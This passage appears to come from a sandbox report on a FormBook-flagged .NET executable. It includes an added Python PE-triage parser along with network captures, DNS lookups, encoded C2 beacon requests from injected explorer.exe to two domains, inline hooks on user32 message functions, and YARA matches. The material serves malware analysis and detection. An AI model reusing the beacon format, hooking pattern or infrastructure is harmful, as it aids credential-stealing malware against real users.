RT_VERSION | 0x960a0 | 0x36c | data | |
RT_MANIFEST | 0x9640c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                        Imports

DLL | Import
mscoree.dll | _CorExeMain
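The following is an added worked example, not code from the Joe Sandbox report or from the analysed sample: a dependency-free PE32 parser that reproduces the checks behind the Static PE Info tables above (which section holds the entry point, per-section entropy and characteristics, DllCharacteristics, presence of the CLR header, and whether the entry point is the FF 25 jmp through the IAT that reaches mscoree!_CorExeMain). The 7.2 entropy threshold for flagging a section as packed or encrypted is an assumption. Because the sample itself is not embedded here, the block builds a minimal PE in memory with the same layout as the report (IAT at the start of .text, a high-entropy body, the stub near the end of .text, then .rsrc and .reloc) as constructed input; the import directory it references is a placeholder and is not parsed.

```python
# Added example (not from the Joe Sandbox report): dependency-free PE32 triage that
# reproduces the checks behind the "Static PE Info" tables.
import hashlib
import math
import struct
from collections import Counter

SCN_FLAGS = {  # IMAGE_SECTION_HEADER.Characteristics bits (PE/COFF specification)
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
DLL_FLAGS = {0x40: "DYNAMIC_BASE", 0x100: "NX_COMPAT", 0x400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
DIR_IAT, DIR_COM_DESCRIPTOR = 12, 14   # data directory indices
PACKED_ENTROPY = 7.2                   # assumption: above this a section is probably packed/encrypted


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, at most 8.0)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def triage(blob: bytes) -> dict:
    """Parse a PE32 image and return the fields an analyst checks first."""
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]
    image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", blob, opt + 70)[0]
    n_dirs = struct.unpack_from("<I", blob, opt + 92)[0]
    dirs = [struct.unpack_from("<II", blob, opt + 96 + 8 * i) for i in range(n_dirs)]

    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr,
            "entropy": shannon_entropy(blob[rawptr:rawptr + rawsize]),
            "flags": [n for bit, n in SCN_FLAGS.items() if chars & bit],
        })

    def rva_to_offset(rva):
        for s in sections:
            if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
                return s["rawptr"] + rva - s["va"], s["name"]
        return None, None

    ep_off, ep_section = rva_to_offset(entry_rva)
    iat_rva = dirs[DIR_IAT][0] if len(dirs) > DIR_IAT else 0
    # A managed EXE's native entry point is 'FF 25 <abs addr>': jmp dword ptr [IAT slot],
    # and the single IAT slot resolves to mscoree!_CorExeMain.
    clr_stub = False
    if ep_off is not None and blob[ep_off:ep_off + 2] == b"\xff\x25":
        clr_stub = struct.unpack_from("<I", blob, ep_off + 2)[0] - image_base == iat_rva
    return {
        "entrypoint": image_base + entry_rva,
        "entrypoint_section": ep_section,
        "is_dotnet": len(dirs) > DIR_COM_DESCRIPTOR and dirs[DIR_COM_DESCRIPTOR][0] != 0,
        "clr_stub": clr_stub,
        "dll_characteristics": [n for bit, n in DLL_FLAGS.items() if dll_chars & bit],
        "sections": sections,
        "suspicious_sections": [s["name"] for s in sections if s["entropy"] > PACKED_ENTROPY],
    }


def build_sample_pe() -> bytes:
    """Constructed input: a minimal PE32 laid out like the report's sample (IAT at the
    start of .text, high-entropy body, CLR stub near the end, then .rsrc and .reloc)."""
    image_base, text_va, text_raw, text_size = 0x400000, 0x2000, 0x200, 0x400
    entry_rva = text_va + text_size - 0x10
    body = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(31))  # deterministic noise
    iat = struct.pack("<II", 0x23A8, 0)                            # one thunk + terminator (placeholder)
    stub = b"\xff\x25" + struct.pack("<I", image_base + text_va)   # jmp dword ptr [00402000h]
    text = (iat + body).ljust(entry_rva - text_va, b"\0") + stub
    manifest = b'<?xml version="1.0" encoding="UTF-8"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1"/>'
    reloc = struct.pack("<III", text_va, 0xC, 0)
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2], dirs[5] = (0x23A0, 0x4F), (0x3000, len(manifest)), (0x4000, 0xC)
    dirs[DIR_IAT], dirs[DIR_COM_DESCRIPTOR] = (text_va, 8), (text_va + 8, 0x48)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0x60F242BD, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII", 0x10B, 48, 0, text_size, 0x400, 0, entry_rva,
                      text_va, 0x3000, image_base, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x5000, 0x200, 0,
                      2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)

    def sec(name, va, vsize, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)

    headers = (dos + b"PE\0\0" + coff + opt
               + sec(b".text", text_va, len(text), text_size, text_raw, 0x60000020)
               + sec(b".rsrc", 0x3000, len(manifest), 0x200, 0x600, 0x40000040)
               + sec(b".reloc", 0x4000, 0xC, 0x200, 0x800, 0x42000040))
    return (headers.ljust(text_raw, b"\0") + text.ljust(text_size, b"\0")
            + manifest.ljust(0x200, b"\0") + reloc.ljust(0x200, b"\0"))


if __name__ == "__main__":
    report = triage(build_sample_pe())
    print(f"entry point 0x{report['entrypoint']:x} in {report['entrypoint_section']}, "
          f".NET={report['is_dotnet']}, CLR stub={report['clr_stub']}, suspicious={report['suspicious_sections']}")
    for s in report["sections"]:
        print(f"  {s['name']:8} entropy={s['entropy']:.2f} {', '.join(s['flags'])}")
```

Run against the real sample (`triage(open("mal.exe", "rb").read())`) the same code reports the values in the tables above: entry point in .text, a .text entropy near 7.86 that trips the packed threshold, the CLR header present, and the entry stub jumping through the IAT at RVA 0x2000. A high-entropy .text in a .NET binary is the signal to move on to the managed code (obfuscated IL or an encrypted payload resource) rather than to the native disassembly.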

                                        Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2013 - 2021
Assembly Version | 1.0.0.0
InternalName | ObjectEqualityCompar.exe
FileVersion | 1.0.0.0
CompanyName | Ant Z
LegalTrademarks |
Comments |
ProductName | dDice Board
ProductVersion | 1.0.0.0
FileDescription | dDice Board
OriginalFilename | ObjectEqualityCompar.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 08:46:34.757560968 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:34.920352936 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:34.920469046 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:34.920579910 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.083355904 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185102940 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185132980 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185158968 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185180902 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185201883 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185226917 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185244083 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185260057 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185276031 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185291052 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.185348034 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.185430050 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.283205032 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.337038040 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.350320101 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.350378990 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.350410938 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.350434065 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.350441933 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.350474119 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.350476027 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.350503922 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.350537062 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:35.350538015 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.350630045 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.350687981 CEST | 49741 | 80 | 192.168.2.3 | 209.99.64.55
Jul 22, 2021 08:46:35.513433933 CEST | 80 | 49741 | 209.99.64.55 | 192.168.2.3
Jul 22, 2021 08:46:55.629483938 CEST | 49744 | 80 | 192.168.2.3 | 52.58.78.16
Jul 22, 2021 08:46:55.671760082 CEST | 80 | 49744 | 52.58.78.16 | 192.168.2.3
Jul 22, 2021 08:46:55.671914101 CEST | 49744 | 80 | 192.168.2.3 | 52.58.78.16
Jul 22, 2021 08:46:55.672247887 CEST | 49744 | 80 | 192.168.2.3 | 52.58.78.16
Jul 22, 2021 08:46:55.714323997 CEST | 80 | 49744 | 52.58.78.16 | 192.168.2.3
Jul 22, 2021 08:46:55.714467049 CEST | 80 | 49744 | 52.58.78.16 | 192.168.2.3
Jul 22, 2021 08:46:55.714554071 CEST | 80 | 49744 | 52.58.78.16 | 192.168.2.3
Jul 22, 2021 08:46:55.714948893 CEST | 49744 | 80 | 192.168.2.3 | 52.58.78.16
Jul 22, 2021 08:46:55.715132952 CEST | 49744 | 80 | 192.168.2.3 | 52.58.78.16
Jul 22, 2021 08:46:55.757101059 CEST | 80 | 49744 | 52.58.78.16 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 08:44:51.458204031 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:44:56.829283953 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:44:56.886512995 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:44:58.067944050 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:44:58.127675056 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:01.566647053 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:01.618920088 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:02.785415888 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:02.834528923 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:04.127221107 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:04.187202930 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:05.395222902 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:05.447316885 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:06.547672033 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:06.598192930 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:07.696602106 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:07.749336958 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:09.949743986 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:09.999214888 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:11.109864950 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:11.166743994 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:12.624847889 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:12.674185038 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:14.427427053 CEST | 60500 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:14.487272978 CEST | 53 | 60500 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:16.753005981 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:16.802360058 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:17.686148882 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:17.735698938 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:18.797241926 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:18.849786043 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:22.537863016 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:22.590339899 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:22.643804073 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:22.711456060 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:24.932343960 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:24.984980106 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:26.354058981 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:26.407027960 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:27.647547007 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:27.707258940 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:29.410845995 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:29.491995096 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:40.842348099 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:40.910532951 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:46.791016102 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:46.848736048 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:45:59.730150938 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:45:59.789141893 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:46:04.129590034 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:46:04.189656019 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:46:34.563913107 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:46:34.728636026 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:46:34.750056028 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:46:34.787168026 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:46:36.639389992 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:46:36.699801922 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Jul 22, 2021 08:46:55.566098928 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Jul 22, 2021 08:46:55.627665997 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 08:46:34.563913107 CEST | 192.168.2.3 | 8.8.8.8 | 0xb083 | Standard query (0) | www.mybabytennis.com | A (IP address) | IN (0x0001)
Jul 22, 2021 08:46:55.566098928 CEST | 192.168.2.3 | 8.8.8.8 | 0xe69 | Standard query (0) | www.sarahcarver.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 08:46:34.750056028 CEST | 8.8.8.8 | 192.168.2.3 | 0xb083 | No error (0) | www.mybabytennis.com |  | 209.99.64.55 | A (IP address) | IN (0x0001)
Jul 22, 2021 08:46:55.627665997 CEST | 8.8.8.8 | 192.168.2.3 | 0xe69 | No error (0) | www.sarahcarver.com |  | 52.58.78.16 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.mybabytennis.com
• www.sarahcarver.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49741 | 209.99.64.55 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 08:46:34.920579910 CEST | 7257 | OUT | GET /sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9+xe6WE7Z8sx0d/816zczOTA6oQi&ixo0sr=dFQtk HTTP/1.1
Host: www.mybabytennis.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 08:46:35.185102940 CEST | 7265 | IN | HTTP/1.1 200 OK
Date: Thu, 22 Jul 2021 06:46:35 GMT
Server: Apache
Set-Cookie: vsid=928vr3744819950810715; expires=Tue, 21-Jul-2026 06:46:35 GMT; Max-Age=157680000; path=/; domain=www.mybabytennis.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_V1iJ5dQh21esvqyq8b7SOOb09E/Ey8thZJ4ysrzpYmPV9tiLY/fxl+NKHpYYoUEsQzwKG2W3tK274B7HIDnlFA==
Keep-Alive: timeout=5, max=121
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
                                        Data Raw: 35 61 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 79 62 61 62 79 74 65 6e 6e 69 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 79 62 61 62 79 74 65 6e 6e 69 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 79 62 61 62 79 74 65 6e 6e 69 73 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 61 44 4e 48 55 6d 68 36 51 30 4a 5a 63 7a 68 73 57 55 46 31 56 57 4e 4d 61 46 42 50 61 6a 52 74 53 58 64 5a 4e 55 31 52 4d 57 78 58 54 69 39 69 61 33 5a 79 4b 30 78 54 59 32 51 77 5a 30 5a 71 62 45 74 69 65 53 74 50 65 6b 78 5a 4e 6d 74 4c 52 33 4a 32 63 56 
45 7a 65 6b 46 68 4f 45 4a 35 51 6b 56 6c 52 33 4a 49 63 47 4e 48 53 7a 42 46 65 45 68 6b 4f 46 68 4b 59 58 52 35 4d 48 52 42 53 69 74 49 54 55 52 77 55 6c 46 74 61 6d 38 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74
                                        Data Ascii: 5afe<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.mybabytennis.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.mybabytennis.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.mybabytennis.com/sk-logabpstatus.php?a=aDNHUmh6Q0JZczhsWUF1VWNMaFBPajRtSXdZNU1RMWxXTi9ia3ZyK0xTY2QwZ0ZqbEtieStPekxZNmtLR3J2cVEzekFhOEJ5QkVlR3JIcGNHSzBFeEhkOFhKYXR5MHRBSitITURwUlFtam89&b="+abp;document.body.appendChild(imglog);if(t


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49744 | 52.58.78.16 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 08:46:55.672247887 CEST | 7301 | OUT | GET /sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk HTTP/1.1
Host: www.sarahcarver.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jul 22, 2021 08:46:55.714467049 CEST | 7301 | IN | HTTP/1.1 410 Gone
Server: openresty
Date: Thu, 22 Jul 2021 06:45:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 73 61 72 61 68 63 61 72 76 65 72 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 62 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 73 61 72 61 68 63 61 72 76 65 72 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='5; url=http://www.sarahcarver.com/' />a </head>9 <body>3b You are being redirected to http://www.sarahcarver.coma </body>8</html>0


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEE
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEE
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEE
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEE

Statistics

Behavior

System Behavior

General

Start time: 08:44:58
Start date: 22/07/2021
Path: C:\Users\user\Desktop\mal.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\mal.exe'
Imagebase: 0x650000
File size: 605696 bytes
MD5 hash: B9BCA038D7532EC8A1A9BA0E867061BC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

General

Start time: 08:45:17
Start date: 22/07/2021
Path: C:\Users\user\Desktop\mal.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\mal.exe
Imagebase: 0xa80000
File size: 605696 bytes
MD5 hash: B9BCA038D7532EC8A1A9BA0E867061BC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, Author: Joe Security
